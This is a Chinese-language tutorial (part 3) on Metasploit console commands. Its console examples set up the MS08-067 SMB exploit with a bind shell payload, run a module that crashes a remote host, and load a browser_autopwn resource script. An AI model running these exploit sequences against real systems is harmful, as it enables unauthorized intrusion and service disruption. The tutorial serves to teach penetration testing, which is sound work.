Metasploit使用简介3

conect 命令

connect命令可以连接到远程主机，连接方式和nc、telnet相同，可以指定端口，如下为connect命令演示：

msf > connect 127.0.0.1 4000 [*] Connected to 127.0.0.1:4000 Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation.  All rights reserved.   E:\技术工具\cmd>msf >

set命令

set命令用于当前使用模块的选项和设置参数。

set payload  xxx/xxx z设置溢出代码

set encoder xxx/xxx 设置利用程序编码方式

set target xxx 设置目标类型

set xxx xxx 设置参数

下面以ms08-067为例：

msf > use windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > show options  Module options:     Name     Current Setting  Required  Description    ----     ---------------  --------  -----------    RHOST                     yes       The target address    RPORT    445              yes       Set the SMB service port    SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)  Exploit target:     Id  Name    --  ----    0   Automatic Targeting  msf exploit(ms08_067_netapi) > set RHOST 192.168.10.10 RHOST => 192.168.10.10 msf exploit(ms08_067_netapi) > set payload windows/shell/bind_tcp payload => windows/shell/bind_tcp msf exploit(ms08_067_netapi) > show options  Module options:     Name     Current Setting  Required  Description    ----     ---------------  --------  -----------    RHOST    192.168.10.10    yes       The target address    RPORT    445              yes       Set the SMB service port    SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)  Payload options (windows/shell/bind_tcp):     Name      Current Setting  Required  Description    ----      ---------------  --------  -----------    EXITFUNC  thread           yes       Exit technique: seh, thread, process    LPORT     4444             yes       The listen port    RHOST     192.168.10.10    no        The target address  Exploit target:     Id  Name    --  ----    0   Automatic Targeting  msf exploit(ms08_067_netapi) >exploit

check命令

      部分exploit支持check命令，该命令用于检测目标系统是否存在漏洞，而不是进行溢出操作。如下：说明目标系统不存在漏洞

msf exploit(ms04_045_wins) > check [-] Check failed: The connection was refused by the remote host (192.168.1.114:42)

设置全局变量

Metasploit 支持设置全局变量并可以进行存储，下次登录时直接使用。设置全局变量使用setg命令，unsetg撤销全局变量，save用于保存全局变量。如下所示：

msf > setg LHOST 192.168.1.101 LHOST => 192.168.1.101 msf > setg RHOSTS 192.168.1.0/24 RHOSTS => 192.168.1.0/24 msf > setg RHOST 192.168.1.136 RHOST => 192.168.1.136 msf > save Saved configuration to: /root/.msf3/config

exploit/run命令

设置好各个参数后，可以使用exploit命令执行溢出操作，当使用了自定义auxiliary参数时，需要用run命令执行操作。

msf auxiliary(ms09_001_write) > run Attempting to crash the remote host... datalenlow=65535 dataoffset=65535 fillersize=72 rescue…

resource命令

resource命令可以加载资源文件，并按顺序执行文件中的命令。

msf > resource karma.rc resource> load db_sqlite3 [-] [-] The functionality previously provided by this plugin has been [-] integrated into the core command set. Use the new 'db_driver' [-] command to use a database driver other than sqlite3 (which [-] is now the default). All of the old commands are the same. [-] [-] Failed to load plugin from /pentest/exploits/framework3/plugins/db_sqlite3: Deprecated plugin resource> db_create /root/karma.db [*] The specified database already exists, connecting [*] Successfully connected to the database [*] File: /root/karma.db resource> use auxiliary/server/browser_autopwn resource> setg AUTOPWN_HOST 10.0.0.1 AUTOPWN_HOST => 10.0.0.1

irb命令

运行irb命令，进入irb脚本模式，可以执行命令创建脚本。

msf > irb [*] Starting IRB shell... >> puts "BlackAngle!" BlackAngle!